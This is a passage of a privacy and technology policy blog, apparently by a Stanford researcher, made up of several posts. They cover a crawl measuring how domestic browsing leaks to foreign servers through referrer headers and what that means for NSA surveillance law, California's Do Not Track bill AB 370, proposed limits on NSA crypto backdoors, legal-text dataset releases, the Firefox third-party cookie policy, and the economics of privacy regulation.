I conducted a small experiment in late September to gauge the magnitude of the international referrer issue. Using FourthParty, a Web measurement platform we’ve built in the Stanford Security Lab, I tested 2,500 popular websites.⁷ The results were concerning, albeit unsurprising: international referrers are pervasive. I spotted the phenomenon on pages across many categories of popular websites, including political commentary (examples: National Review and Talking Points Memo), popular culture (Buzzfeed and Parade), sports (Major League Baseball and the PGA Tour), travel (Lonely Planet), consumer products (Nike), retail (Overstock), and personal health (Medicare.gov). Yes, even the apple pie recipe on CHOW has a Canadian component. So much for a bright line dividing the domestic and international Web.

This technical result raises serious legal questions. Has Congress authorized wholesale surveillance of apparently domestic online activity? Does the Fourth Amendment tolerate rampant prying into our homeland web browsing?

There is a strong argument that the answer to both questions is no.⁸ The NSA’s purported statutory authority for Internet surveillance within the U.S. expressly prohibits snooping on domestic communications where “all intended recipients” are also domestic. And both the courts and Congress have rightly recognized that an intercept of Internet content entirely within the United States, much like a telephone wiretap, requires a warrant and probable cause. Even the questionably effective Foreign Intelligence Surveillance Court has required the NSA to ditch purely domestic communications.

For whatever FISC oversight is worth, perhaps the NSA has provided (secret) briefing on international referrers. Perhaps a judge has (secretly) approved. There is, however, cause for doubt.

In 2011, the NSA alerted its judicial overseers to a different technical glitch. When email and other messages transit the Internet, they can get bundled together. If the NSA intercepts an international note, it might also snag purely domestic messages in the same bunch. A FISC judge lambasted the NSA for yet another “substantial misrepresentation” about its mass surveillance and held the program unconstitutional. So, this would hardly be the NSA’s first omission gaffe.

Even if the international referrer issue has been rigorously reviewed, there are myriad other ways that Americans might unknowingly send data overseas. Domestic organizations often place servers outside the United States. A tiny part of the Chevrolet website, for example, resides in Frankfurt, Germany.¹⁰ What’s more, even if a user and server are both stateside, the path connecting them might wander into Canada or Mexico. A domestic cloud business might shuffle data to or from a data center overseas. And many of the online services that Americans use are not obviously international. The popular scheduling website Doodle? Swiss. The music streaming service Spotify? Swedish. The dating website Plenty of Fish? Canadian. The popular link shortener is.gd, used by @Bruce_Schneier¹¹ for blog updates lambasting the NSA? British.

It is difficult to believe that the NSA’s independent supervisors have the technical savvy to consistently identify, assess, and remediate these sorts of problems. The FISC has itself vented frustration about having to accept the agency’s technical claims at face value.

Were intelligence oversight adequate, problems like these would nevertheless recur. The Internet is not balkanized along geopolitical boundaries. Communications are not neatly labeled by nationality and locale. Online systems routinely repackage and reroute activity in convoluted ways. Attempts at singling out Americans will necessarily rely on patchy guesswork. And they will necessarily get it wrong, a lot.

Many thanks to the friends and colleagues at Stanford, Princeton, and elsewhere who provided feedback on this work. All views and errors are solely my own.

This research was the basis for a submission to the Review Group on Intelligence and Communications Technologies within the Office of the Director of National Intelligence.

1. Leaked slides on XKeyscore suggest NSA mass metadata collection includes HTTP headers, and according to the Guardian, a guide on Marina indicates that the program “tracks a user’s browser experience.”

2. I used the Internet Archive’s Wayback Machine to estimate the period during which the House website hosted a Texthelp script. At the time of writing, the script remains on House webpages, but is commented out.

3. Oddly, www.house.gov is hosted by Akamai, while house.gov appears to be hosted from a federal datacenter near Philadelphia.

4. Specifically, the House website included the following in its standard template:

The Texthelp BrowseAloud script, in turn, triggered an HTTP request to babm.texthelp.com.

var $bajq, browsealoud = {
  BASE_ADDRESS: "babm.texthelp.com",
    . . .
    init: function () {
      . . .
      var d;
      try {
        if (window.XDomainRequest) {
          d = new XDomainRequest()
        } else {
          d = new XMLHttpRequest()
        }
        d.open("GET", (this.isSecure ? "https" : "http") + "://" + this.BASE_ADDRESS + "/Detect.ashx", false);
        d.send(null)
      } catch (s) {
        this.debug("ERROR: init: " + s)
      }
      if (d.responseText !== "") {
        this.localeId = d.responseText
      }
      . . .
    },
    . . .
};
document.write(browsealoud.init());

5. A corollary concern, which I do not address here, is that an Internet user outside the United States may access a website that is also outside the United States, but includes American third-party content. Many of the largest third parties are based in the United States, so this phenomenon is quite likely pervasive. Researchers at the University of Toronto have documented the related concern of network paths that happen to pass through the United States.

6. I cannot, of course, say how often NSA analysts inspect international referrers from domestic websites—leaks have not (yet?) provided such granular detail. As privacy scholars have pointed out time and again, though, concerns arise from the moment of data collection—not just when data is used. One particular source of concern is insider misbehavior, which the NSA has hardly proven immune to.

7. The crawler visited the Quantcast U.S. top 2,500 websites, following five links from each landing page. It spent fifteen seconds on each page so that dynamic content could load. After the crawl finished, I searched HTTP Request-URI and Referer headers for leakage of the URLs of pages visited during the crawl. Next, I used the MaxMind GeoLite Country database to spot receiving servers possibly located outside the United States. I finally confirmed servers were international by running the traceroute utility and manually inspecting its output. All Internet access was through the Stanford University network.

8. Since the focus of this already-lengthy post is technology and policy concerns, I do not provide a detailed treatment of legal considerations. Related issues include the location of acquisition, the scope of Executive Order 12333 and Article II authority, the extent of Fourth Amendment protection in HTTP headers, whether statutory and constitutional protections encompass international referrers as domestic, quasi-domestic, or one-end-foreign communications, whether acquisition of international referrers is permissible as incidental to lawful acquisition, and whether statutory and constitutional protections are triggered at the time of acquisition or only when used in intelligence analysis.

9. To the extent Internet traffic acquisition occurs outside the U.S., the administration appears to not even brief the FISC and not provide unprompted briefing to Congress.

10. The chevrolet.com server appears to be located in Frankfurt. If you load chevrolet.com in your browser, you will then be redirected to www.chevrolet.com, which is hosted domestically by Akamai.

11. I have no idea if this account is actually operated by Bruce Schneier, though that’s beside the point. Many users clicking on links critical of the NSA may be, ironically, tipping off the NSA.

Do Not Track in California

jonathan — Tue, 10 Sep 2013 15:40:43 +0000

Both houses of the California legislature have unanimously approved AB 370, a Do Not Track initiative that is backed by Attorney General Harris. If Governor Brown signs the bill, it will be the first Do Not Track law worldwide. So, what would it do? More and less than a casual reader might expect.

The California Online Privacy Protection Act

To understand AB 370, you have to understand the California Online Privacy Protection Act (“CalOPPA”). The law was enacted in 2003, with the primary aim of requiring privacy policies on consumer websites. For the most part, CalOPPA has succeeded: Popular websites have largely come into compliance. Applications of the law have been generally unambiguous and uncontroversial.¹

Unfortunately, CalOPPA shows its age. First, the law’s requirements are cabined to categories of personally identifiable information, a legal convenience that has been outmoded by advances in computer science. Research has time and again shown that information may be trivially identifiable, even though it doesn’t include obvious identifying information like a name or address. Second, CalOPPA’s phrasing makes sense for a conventional website where a user opens an account. But what about the ecosystem of third-party websites that users have never heard of and never log into? These limitations may prove fatal to AB 370’s legislative policy.

Do Not Track Transparency

AB 370 aims to bring transparency to online tracking. The notion is that if a company is in the business of tracking users, it’ll have to disclose how it treats the Do Not Track setting in popular browsers.² Good idea, but not so good legislative drafting.

AB 370 bolts Do Not Track onto CalOPPA. The trouble is, CalOPPA and Do Not Track come from different eras. CalOPPA is written in the language of personally identifiable information and first-party websites. Do Not Track is designed to address re-identifiable information and third-party websites.

The result is a serious statutory interpretation question.³ Trackers have a number of possible grounds for claiming they are exempt from CalOPPA and AB 370, such as:

Because we’re third parties, consumers don’t “use or visit” our services.
The information that we collect is not “about” an “individual consumer,” but rather, related to a browser or device.
Our data isn’t “personally identifiable information,” it’s just browsing activity and web protocol logs.⁴
To the extent there is any personally identifiable information that flows to us, we don’t “collect” it because we don’t actually use it for our business.
Similarly, any personally identifiable information that we possess exists in logs that aren’t “maintained . . . in an accessible form.”

So, are third-party web and mobile trackers actually covered by the bill? Unclear.

A tracker’s obligations under AB 370 are also ambiguous. If a service is covered, it has to explain how it “responds to Web browser ‘do not track signals’ or other mechanisms” for consumer choice. What about Do Not Track implementations that aren’t in a conventional “Web browser,” such as Firefox OS? If a tracker offers a self-regulatory mechanism for consumer choice, does the “or” exempt it from describing its treatment of Do Not Track? Again, unclear.

In sum, trackers appear to have non-frivolous legal arguments that they fall outside CalOPPA and AB 370. And if they are covered, they have non-frivolous legal arguments that existing self-regulatory practices are enough.

Do Not Track Substance

Proponents of AB 370 emphasize that it is a Do Not Track transparency bill, not a substantive Do Not Track bill. That’s true in one sense: the bill doesn’t compel any business to support Do Not Track. It’s not true in another sense, though: the bill sneaks in a definition of Do Not Track.⁵

For over two years, privacy advocates and technology companies have haggled over how to define Do Not Track in the World Wide Web Consortium. (I recently resigned from the group owing to its stagnation.) AB 370 sidesteps those efforts and applies its own definition: a business is covered if it collects information about “online activities over time and across third-party . . . online services.” The definition is vague, to be sure, and would need clarification through policy statements, enforcement, and adjudication. But, crucially, the definition is a matter of California law. It does not depend on the W3C’s efforts.

Concluding Thoughts

AB 370 reflects political savvy by the Attorney General and her team. The bill advances Do Not Track in a way that is difficult to oppose—who’s against transparency?—and it lays a foundation for future CalOPPA and Do Not Track initiatives. Moreover, though the bill’s drafting opens it to interpretive challenges, the AG is well-positioned to respond: She would be seeking a legislative quick fix to restore the law’s intent, not an unprecedented foray into contested Do Not Track territory.

A close reading of AB 370 may also explain tame industry resistance. Remarkably, legislative reports reflect limited formal opposition. If trade groups and leading companies believe they can effectively nullify the bill’s impact in the courts, they may feel lesser impetus to expend political capital on obstruction in the legislature. If accurate, this view would reflect a strategic forecasting disconnect between the Attorney General and commercial stakeholders.

Enough about motives and strategy. This much is certain: If AB 370 becomes law, stay tuned for future tussles over what the legislation means and how it might be revised or expanded. Do Not Track in California is just getting started.

This bill is sponsored by the California Attorney General’s Office. I previously collaborated with Cal DOJ on online privacy issues, but not this particular bill.

I am not a lawyer. This is not legal advice.

1. There has been one substantial controversy about CalOPPA’s coverage formula. In February 2012, Attorney General Harris announced that she interprets “online service” to encompass mobile apps. The major mobile platforms acquiesced, and the interpretation has not been challenged in court.

2. Another provision of AB 370 aims to increase transparency by compelling first parties to provide disclosures about third-party tracking.

Disclose whether other parties may collect personally identifiable information about an individual consumer’s online activities over time and across different Web sites when a consumer uses the operator’s Web site or service.

This mandate does not, however, require identifying particular practices or third parties. The likely effect will be boilerplate notices of limited utility, to the effect of: “Some third parties may track our users.” The provision may also be open to a CDA 230 preemption argument.

3. This post focuses on statutory interpretation challenges to AB 370. The bill may be vulnerable to other attacks, such as federal statutory preemption or unconstitutionality. According to legislative reports, critics of AB 370 have emphasized narrow statutory interpretation in their discussion of the bill.

4. One category of “personally identifiable information” is:

Any other identifier that permits the physical or online contacting of a specific individual.

A Senate Judiciary report suggests that this provision is broad enough to encompass tracking. (Strangely, the discussion appears to conflate the scope of “personally identifiable information” with the scope of “collection.”)

“[Critics] offer an interpretation of the definition of “personally identifiable information” that only includes information actively or knowingly provided by a Web user, which, by implication, would not include the passive collection of information via online tracking addressed in this bill. Such an interpretation of existing law needlessly restricts the definition of “personally identifiable information” to the active (and by implication voluntary or consensual) transmission of information, overlooking the fact that subsection (a)(6) of the definition sweeps in “[a]ny other identifier that permits the physical or online contacting of a specific individual,” including information passively collected from an individual.

The Attorney General also indicates in a mobile privacy report that “personally identifiable information” includes unique identifiers used in tracking.

5. Earlier versions of the bill, in fact, expressly defined the term “online tracking.”

Legislating NSA Crypto Circumvention

jonathan — Sat, 07 Sep 2013 14:30:56 +0000

The National Security Agency works to circumvent cryptography. In the abstract, that’s hardly objectionable—legitimate intelligence targets may adopt security measures. Concerns arise, however, when the NSA subverts the technologies that ordinary consumers and businesses rely upon. Longstanding conventional wisdom in the computer security community has been that the NSA works to insert backdoors into crypto standards and security products, and that the agency hoards vulnerabilities in popular crypto algorithms and implementations. Widely read reports recently confirmed these views.

The go-to recommendation among many security experts has been deployment of additional protective measures. That’s an appealing near-term option for sophisticated users and companies. It’s largely impractical for ordinary users, however. And adding more crypto won’t restore damaged trust, shut potentially risky backdoors, or patch vulnerable systems.

The law offers several possible long-term directions for reform. Consider the following example legislative proposals.

No crypto math backdoors. Prohibit misrepresentation of the security properties of a cryptographic algorithm or protocol that is undergoing NIST standardization.¹

No compelled implementation backdoors. At present, there is ambiguity surrounding legal authority to compel a backdoor in a security system. Clarify that providers of secure hardware and software are not required to facilitate government access.²

No sneaking in wide-scale implementation backdoors. Prohibit inserting or suggesting surreptitious weaknesses in popular security technologies. For example, the NSA would be barred from introducing an exploitable flaw into OpenSSL.

Responsible vulnerability disclosure. Require the NSA to publicize vulnerabilities in security systems that are widely used by consumers and businesses. Details and timing of disclosure might vary by context-specific factors such as severity, likelihood of discovery by others, sensitivity of means of discovery, and immediate operational necessity.

Let me again emphasize, these are examples. There are many possible drawbacks and there is much room for improvement. I suggest them merely as a starting point: technology experts could, working with Congress, improve trust and reduce risk in secure systems. Deploying new security technology is an understandable first step. For a long-term fix, though, the security community should think carefully about law.

1. See 15 U.S.C. § 278g-3 for the basic legal framework of NIST computer security standards.

2. The Communications Assistance for Law Enforcement Act (CALEA) provides a possible starting point. Under 47 U.S.C. § 1002(b)(3): “A telecommunications carrier shall not be responsible for decrypting, or ensuring the government’s ability to decrypt, any communication encrypted by a subscriber or customer, unless the encryption was provided by the carrier and the carrier possesses the information necessary to decrypt the communication.”

Update Representative Rush Holt (D-NJ 12) is calling for a legislative response. The current draft of Holt’s proposal, H.R. 2818, addresses compelled backdoors.

Advancing Empirical Legal Scholarship: Federal Trial Opinions and Rules

jonathan — Sat, 10 Aug 2013 00:03:38 +0000

In earlier posts I have shared XML versions of certain legal materials, including federal statutes, appellate opinions, and appellate rules. My aim has been to assist empirical legal scholars by providing machine-readable government documents.

Additional legal materials accompany this post, including federal trial-level opinions and rules. Suggestions from the research community remain very much welcome.

Update January 13, 2014: The data is now hosted on Amazon S3 in a requester pays bucket. If you have not properly configured your request, you will receive an “Access Denied” error.

Constitution of the United States: ZIP (46 KB)
Federal Rules of Bankruptcy Procedure: ZIP (242 KB)
Federal Rules of Civil Procedure: ZIP (184 KB)
Federal Rules of Criminal Procedure: ZIP (92 KB)
Federal Rules of Evidence: ZIP (55 KB)
Federal Sentencing Guidelines: ZIP (2 MB)
Internal Revenue Service Revenue Rulings: ZIP (3 MB)
Rules of the Supreme Court of the United States: ZIP (61 KB)
Trademark Trial and Appeal Board Opinions: ZIP (62 MB)
United States Bankruptcy Court Opinions: ZIP (690 MB)
United States District Court Opinions: ZIP (6 GB)
Rules of the Judicial Panel on Multidistrict Litigation: ZIP (30 KB)
United States Tax Court Opinions: ZIP (124 MB)

Please note, this is a personal project. It is not related to my coursework or research at Stanford University.

Next Steps for the Firefox Cookie Policy

jonathan — Tue, 21 May 2013 14:45:41 +0000

Consumers neither expect nor approve of web tracking.¹ Mozilla has been a frequent advocate for its users, advancing technologies that signal preferences (Do Not Track), lend transparency (Collusion), and facilitate privacy-friendly web services (Persona and Social API). Last fall, the Mozilla community began a concerted effort in a new direction: technical countermeasures against tracking.² One of our first projects has been a revision of the Firefox cookie policy.³

Cookie policies are inherently imprecise. Some unwanted tracking cookies might slip through, compromising user privacy (“underblocking”). And some non-tracking cookies might get blocked, breaking the web experience (“overblocking”). The challenge in designing a cookie policy is calibrating the tradeoff between underblocking and overblocking.⁴

The patch that I developed is an intentionally cautious first step: it aims to substantially reduce underblocking with little (if any) overblocking. The revised policy is so cautious, it isn’t even new: it’s drawn directly from Safari.⁵ Almost every iPhone, iPad, and iPod Touch user is already running the revised Firefox cookie policy. Web engineers are already familiar with designing to accomodate the policy. The notion is simple: start by raising Firefox to the present best practice among competing browsers, then iteratively innovate improvements.

Firefox’s revised cookie policy landed in the pre-alpha build in late February. Since then, Mozillans and I have carefully monitored bug reports. It appears that we achieved our aim: there are only two confirmations of inadvertent breakage.⁶ We did not hear any novel concerns when the patch advanced to alpha in early April. This past week, Mozilla’s CTO requested a hold on the revised policy for an extra release cycle to measure its performance. At the same time, he reaffirmed that Mozilla is “committed to user privacy” and “committed to shipping a version of the patch that is ‘on’ by default.”

I agree that we should be quantitatively rigorous in our approach to iterating the Firefox cookie policy. An extra six-week release cycle will allow us to further validate our hypothesis that the patch delivers improved privacy without breakage,⁷ as well as lay the groundwork for future updates. Going forwards, our challenge will be to understand and improve the underblocking and overblocking properties of the Firefox cookie policy.

Underblocking and Overblocking

There are at least three substantial areas of underblocking that we know we need to address with future improvements.

Old cookies. The revised policy does not limit preexisting tracking cookies. Firefox users who update to the revised policy will not fully benefit until they clear their cookies.
Temporary visits. Sometimes a user temporarily visits a tracking website, such as after clicking an advertisement (intentionally or inadvertently). The revised policy indefinitely allows tracking cookies from a website after just one temporary visit.
Dual-use domains. Several popular websites use the same domain for both consumer services and tracking. Yahoo!, for example, operates both its homepage and advertisement tracking from yahoo.com. If a user visits the Yahoo! homepage, the company will be able to track the user across other websites. Google, on the other hand, largely hosts search on google.com but advertising tracking on doubleclick.net. If a user runs a query with Google, they will still be protected against Google ad tracking.

As for overblocking, again, I am not aware of any significant shortcomings with the revised cookie policy.⁸

Next Steps

We have a number of tools at our disposal for improving our understanding of the Firefox cookie policy, including feedback solicitations, user surveys, browser measurements, web crawls, and much more. There are many possible directions for product innovation, including heuristics, machine learning, community reporting, manually-curated lists, mechanisms for confirming user preferences, new user interfaces, new APIs, and new institutions.

I look forward to continuing collaboration with Mozilla and its community on web privacy and security. I’m excited to get the revised cookie policy into users’ hands. And I’m even more excited about building what comes next.

All views, errors, and omissions are solely my own. I do not speak for Mozilla or the Mozilla community.

1. See the survey paper Third-Party Web Tracking: Policy and Technology for background. In the context of this post, “tracking” means the collection of a user’s browsing history by a third-party website.

2. For an overview of Mozilla’s open-source community model, see MozillaWiki » Community and Mozilla.org » Governance. Many members of the Mozilla community have now contributed to the tracking countermeasures effort.

3. Apple and Microsoft have both automatically limited tracking cookies for a decade. There was an effort to block tracking cookies by default in Firefox three years ago, but it was withdrawn under contested circumstances (1, 2, 3, 4).

4. Other considerations could include types of underblocking and overblocking, as well as possible reactions to the policy. Future posts might address these topics, depending on reader interest.

5. In the interest of precision: the revised Firefox cookie policy is slightly more permissive than the Safari policy owing to implementation specifics. Additional details are in an earlier post.

6. The sites are dayonecenter.com (Alexa rank > 1M) and western.org (Alexa rank ≈ 200K).

7. As I understand our release conditions, the patch will move forward unless there’s confirmed breakage, the breakage is so substantial as to outweigh longstanding user demand for privacy, and the breakage cannot be ameliorated through outreach, mitigation measures, or rapid iteration. Under present circumstances, the patch plainly satisfies these release conditions.

8. We may wish to relatedly take steps to accommodate websites (if any) that have a third-party domain, do not compromise consumer privacy, do not break the consumer web experience without cookies, cannot deploy an accommodation for the revised cookie policy, require cookies for functionality, and have lost that functionality on account of the revised policy.

Advancing Empirical Legal Scholarship: Federal Appellate Opinions and Rules

jonathan — Sat, 04 May 2013 00:00:57 +0000

Last December I shared XML versions of the U.S. Code and Supreme Court opinions through early 2012. My intent was and remains to facilitate empirical legal scholarship by providing government-authored materials in a machine-readable format.

This post is accompanied by additional documents: opinions and rules of various federal appellate tribunals. As before, I welcome feedback from the academic research community.

Update January 13, 2014: The data is now hosted on Amazon S3 in a requester pays bucket. If you have not properly configured your request, you will receive an “Access Denied” error.

United States Court of Appeals for the First Circuit Opinions: ZIP (152 MB)
United States Court of Appeals for the Second Circuit Opinions: ZIP (311 MB)
United States Court of Appeals for the Third Circuit Opinions: ZIP (239 MB)
United States Court of Appeals for the Fourth Circuit Opinions: ZIP (190 MB)
United States Court of Appeals for the Fifth Circuit Opinions: ZIP (409 MB)
United States Court of Appeals for the Sixth Circuit Opinions: ZIP (244 MB)
United States Court of Appeals for the Seventh Circuit Opinions: ZIP (305 MB)
United States Court of Appeals for the Eighth Circuit Opinions: ZIP (263 MB)
United States Court of Appeals for the Ninth Circuit Opinions: ZIP (442 MB)
United States Court of Appeals for the Tenth Circuit Opinions: ZIP (211 MB)
United States Court of Appeals for the Eleventh Circuit Opinions: ZIP (180 MB)
United States Court of Appeals for the District of Columbia Circuit Opinions: ZIP (209 MB)
United States Court of Appeals for the Federal Circuit Opinions: ZIP (164 MB)

Federal Rules of Appellate Procedure: ZIP (82 KB)
First Circuit Bankruptcy Appellate Rules: ZIP (37 KB)
Sixth Circuit Bankruptcy Appellate Rules: ZIP (29 KB)
Eighth Circuit Bankruptcy Appellate Rules: ZIP (37 KB)
Ninth Circuit Bankruptcy Appellate Rules: ZIP (86 KB)
Tenth Circuit Bankruptcy Appellate Rules: ZIP (37 KB)

United States Board of Immigration Appeals Opinions: ZIP (21 MB)

Please note, this is a personal project. It is not related to my coursework or research at Stanford University.

The New Firefox Cookie Policy

jonathan — Fri, 22 Feb 2013 17:56:36 +0000

The default Firefox cookie policy will, beginning with release 22, more closely reflect user privacy preferences. This mini-FAQ addresses some of the questions that I’ve received from Mozillans, web developers, and users.

How does the new Firefox cookie policy work?

Roughly: Only websites that you actually visit can use cookies to track you across the web.

More precisely: If content has a first-party origin,¹ nothing changes. Content from a third-party origin only has cookie permissions if its origin already has at least one cookie set.

How does Firefox’s new policy compare to the other major browsers?

Chrome – Allows all cookies.

Internet Explorer – Cookie permissions vary by P3P compact policy. In practice, almost all third-party tracking cookies are allowed.²

Safari – First-party content has cookie permissions. Third-party content only has cookie permissions if the content already has at least one cookie set.

In short, the new Firefox policy is a slightly relaxed version of the Safari policy.³

Will the new Firefox policy break websites?

Collateral impact should be limited. Safari’s cookie policy has been in place for over a decade, and it is included in both the desktop and iOS versions of the browser. A few websites may require a tiny code change to accommodate Firefox in the same way as Safari.

Just to be sure, the Mozilla privacy team is closely monitoring the policy before final release. The patch will spend about 6 weeks each in the pre-alpha, alpha, and beta builds. If you spot any oddities, please report them to Mozilla support!

How can I test whether my website has cookie permissions?

Easy: try to set a cookie. This approach can introduce cookie permissions into both server-side and client-side code.

Browser sniffing is generally disfavored since it can be unreliable and requires updating. Moreover, sniffing will not accommodate Chrome and Internet Explorer users who have switched from the default cookie policy.

I operate a third-party website that uses cookies. What should I do?

If a Firefox user appears to have intentionally interacted with your content, take the same approach as for Safari users.⁴ Examples of content within this category include Facebook apps and comment widgets where a user has typed text.

If a user does not seem to have intentionally interacted with your content, or if you’re uncertain, you should ask for permission before setting cookies. Most analytics services, advertising networks, and unclicked social widgets would come within this category.

In sum, working around the policy’s technical limits may be reasonable in certain cases, but undermining the policy’s privacy purpose is never acceptable.

What happens to preexisting cookies?

The new policy does not make any special provision for preexisting cookies. Current Firefox users should clear their cookies to fully benefit from the new policy.⁵

What comes next for the Firefox cookie policy?

There’s still plenty of work to do. Some possible directions that I’m interested in:

Extending the cookie policy to other storage technologies (e.g. HTML5 Web Storage).
Providing a uniform mechanism for requesting storage permissions.
Relaxing the cookie policy for websites that honor Do Not Track.

Please share your ideas on the mozilla.dev.privacy mailing list!

All views are solely my own. I do not speak for Mozilla.

This was my first contribution to the Firefox codebase. Huge thanks to Sid Stamm, Monica Chew, Brendan Eich, Asa Dotzler, Josh Matthews, Justin Dolske, Daniel Veditz, and many other members of the Mozilla community for their advice, guidance, and tolerance of my inexperience.

1. An origin is determined by public suffix + 1. ↩

2. Many researchers have criticized Microsoft’s approach for being ineffective, convoluted, and relying on the de facto deprecated P3P standard. For background, see Token Attempt: The Misrepresentation of Website Privacy Policies Through the Misuse of P3P Compact Policy Tokens by Leon et al. ↩

3. The difference is primarily owing to engineering convenience. ↩

4. The most transparent practice is for you to redirect the user through your origin. You could also use a non-cookie storage technology, though alternatives may be limited by this policy in future. ↩

5. Conventional wisdom in the web privacy community is that users clear their cookies every few months. ↩

Electronic Privacy and Economic Choice

jonathan — Mon, 28 Jan 2013 17:00:07 +0000

Critics of consumer privacy protections frequently invoke revealed preference as a justification for laissez-faire policy. If users really cared about their privacy, the argument goes, we should expect to see revolts against intrusive practices. A number of scholars have demonstrated pervasive information asymmetries¹ and bounded rationality² in consumer privacy choices; the decisions that users actually make about online privacy can hardly be expected to reflect their actual preferences.

But let’s suppose that consumers and online firms are fully informed and completely rational. The economic story that consumers value their privacy less than the marginal income from privacy intrusions is certainly consistent with market behavior.

We should not, however, conclude that the status quo is optimal. There is another congruent economic story, where privacy intrusions are inefficient but nevertheless result owing to transaction costs and competition barriers. This post relates the alternative economic story with two possible examples, then closes with policy implications.

Facebook and Instagram

Consider the recent kerfuffle over Instagram’s user agreement after Facebook acquired the company. An avid Instagram user may have significant concerns about how Facebook might use his or her likeness in advertising products to friends, and the value of those concerns to the user could well exceed the marginal value of new social advertising features to Facebook. The efficient (i.e. welfare-maximizing) outcome would be for Facebook to maintain the preexisting Instagram user agreement.

In a conventional Coasean analysis, Facebook would choose to respect user privacy and extract the welfare gain by charging for its service. From a traditional competition standpoint, if Facebook were to make an inefficient decision to invade consumer privacy, a pro-privacy competitor would spring up and pilfer the site’s users. But what if there are significant transaction costs and competition barriers?³ If Facebook cannot realistically charge its users,⁴ and competition is limited,⁵ then Facebook’s income-maximizing choice is to inefficiently invade consumer privacy. So long as users value social networking on Facebook more than the associated privacy risks, they will continue using the service.

Behavioral Advertising

Behavioral advertising is another possible example. Users may value privacy in their online activities more than the marginal value of tracking-based advertising.⁶ In the absence of transaction costs, online services might do away with behavioral advertising and charge consumers for the content that they access. If there were no competition barriers, services that rely on behavioral advertising might be forced under by free, pro-privacy competitors. Depending on the sector of the online economy, however, a service may have significant transaction costs and competition barriers. The alternative economic story has a measure of predictive power: In some markets with high transaction costs and high barriers to competition (e.g. web search), behavioral advertising is an ordinary practice. Meanwhile, in some markets with low transaction costs and low barriers to competition (e.g. paid mobile apps), behavioral advertising is a rarity.

Policy Implications

If consumer privacy practices are inefficient, then privacy protections could be viewed as mechanisms for correcting structural market failures. Contemporary economic analysis has several lenses to offer:

Internalizing externalities. Online services visit negative privacy externalities upon users; privacy protections compel a service to internalize those externalities.
Solving a collective action problem. If users could collectively negotiate, they would require online services to adopt pro-privacy practices. Users cannot, of course, realistically organize and bind themselves for bargaining at the scale of a mammoth online service. Privacy regulation solves this collective action problem.
Simulating competition. Without competition barriers, online services would be compelled to adopt better privacy practices. Privacy protections stand in for absent effects of competition.
Eliminating an inefficient and unnecessary subsidy. Privacy regulations nix an unjustified payout to online services.

Consumer privacy decision making might also be properly characterized by two choice architecture frames. In the stronger frame, the user is coerced: against a background of society where certain online services are a norm or requirement, the user has no real choice but to give up his or her privacy.⁷ In the weaker frame, the user is exploited: the user has no baseline statistical expectation or moral claim of using an online service, but the value substantially exceeds the privacy risks, and the service would willingly provide functionality without privacy intrusions. If these views are accurate, privacy regulation would constitute a legitimate prohibition against consumer coercion or exploitation.

Parting Thoughts

Privacy reform proponents are quick to cite information asymmetry and bounded rationality as justifications for policy intervention. And they should: the body of research evidence supporting those views is substantial. My aim with this piece is to demonstrate the availability of a second set of arguments, grounded in conventional economics of transaction costs and competition barriers, that would also justify privacy regulation.

If users care about their privacy, why don’t they act like it? Actually, it’s quite possible that they do.

Thanks to Ed Felten and Arvind Narayanan for comments on an early draft. All views and errors are solely my own.

1. For background on information asymmetry in consumer privacy choice, I recommend beginning with work by Lorrie Cranor and Aleecia McDonald.

2. I similarly recommend research by Alessandro Acquisti and Jens Grossklags for an introduction to bounded rationality in consumer privacy choice.

3. A more formal treatment of the two economic stories follows. Assume a user values an online service at S > 0 and his or her marginal privacy on that service at P > 0. An online service marginally values the privacy intrusion at I > 0 and has a baseline income from providing functionality of B. In the oft-invoked revealed preference story, I > P, and privacy regulation imposes a societal loss of I – P. In this alternative economic story, P > I, and lack of privacy regulation imposes a societal loss of P – I. Where there are transaction costs, a transfer is not possible; the only outcomes are (S + P, B) and (S, B + I). In the absence of competition, the service will select an outcome based solely on income maximization. A combination of transaction costs and competition barriers, then, will cause an online service to always invade privacy when I is positive—no matter the relative magnitude of P.

A brief side note: there are three other analytical scenarios worth mentioning.

No transaction costs, no competition barriers. The user would transfer to the service between S + P (the user’s reservation price) and -B (the service’s reservation price). Owing to competitive pressure, the transfer should be closer to -B.
No transaction costs, competition barriers. The user would transfer to the service between S + P (the user’s reservation price) and -B (the service’s reservation price). Since there is no competition, the transfer should be closer to S + P.
Transaction costs, no competition barriers. We would expect an equilibrium respecting privacy where B > 0, and intruding upon privacy where 0 > B. Intuitively, if a pro-privacy competitor would be profitable, it would emerge and undercut the service.

4. There are a number of reasons why Facebook cannot, in practice, charge for its service. A few of the leading considerations:

Network effects. A social network’s value is bound up in the size and engagement of its user base. While some users might pay for privacy, others would not or could not. If Facebook is unable to differentiate between the users it can and cannot charge, then it has to give away the service for free to preserve the value of the social network.
Past promises. Facebook has frequently reaffirmed that its service will always be free. The current landing page, in fact, reads: “It’s free and always will be.” Violating past promises of free service could have significant legal and business implications.
Transaction burdens. Beyond the immediate financial costs, consumers must also incur financial management costs associated with keeping up with a monthly service. From Facebook’s perspective, the firm would have to divert precious attention and resources to developing an unprecedented subscription billing capacity.

The consumer psychology of free vs. paid products is, to be sure, a dominant factor. For purposes of this post, however, set aside the bounded rationality limitation.

5. Many authors and investors have argued that Facebook holds something of a monopoly in social networking.

6. For a discussion of the economics of third-party behavioral advertising, see Part VI of “Third-Party Web Tracking: Policy and Technology.”

7. The notion of moral rights in online services is hotly contested. I do not mean to take a position on the issue here.

Advancing Empirical Legal Scholarship

jonathan — Sat, 29 Dec 2012 01:00:27 +0000

Modern quantitative analysis has upended the social sciences and, in recent years, made exciting inroads with law. How complex are the nation’s statutes?¹ Did a shift in Supreme Court voting dodge President Roosevelt’s court-packing plan?² How do courts apply fair use doctrine in copyright cases?³ What factors determine the outcome of intellectual property litigation?⁴ Researchers have begun to answer these and many more questions through the use of empirical methodologies.

Academics have vaulted numerous hurdles to advance this far, including deep institutional siloing and specialization. But barriers do still exist, and one of the greatest remaining is, quite simply, data. There is no easy-to-get, easy-to-process compilation of America’s primary legal materials. In the status quo, researchers are compelled to spend far too much of their time foraging for datasets instead of conducting valuable analysis. Consequences include diminished scholarly productivity, scant uniformity among published works, and—most frustratingly—deterrence for prospective researchers.

My hope is to facilitate empirical legal scholarship by providing machine-readable primary legal materials. In this first release of data, I have prepared XML versions of the U.S. Code and opinions of the Supreme Court of the United States, through approximately early 2012. Subsequent releases may include additional primary legal materials. I would greatly appreciate feedback from the academic community, particularly with regards to the XML schema, text formatting, and prioritizing materials for release.

Update January 13, 2014: The data is now hosted on Amazon S3 in a requester pays bucket. If you have not properly configured your request, you will receive an “Access Denied” error.

United States Code: ZIP (110 MB)
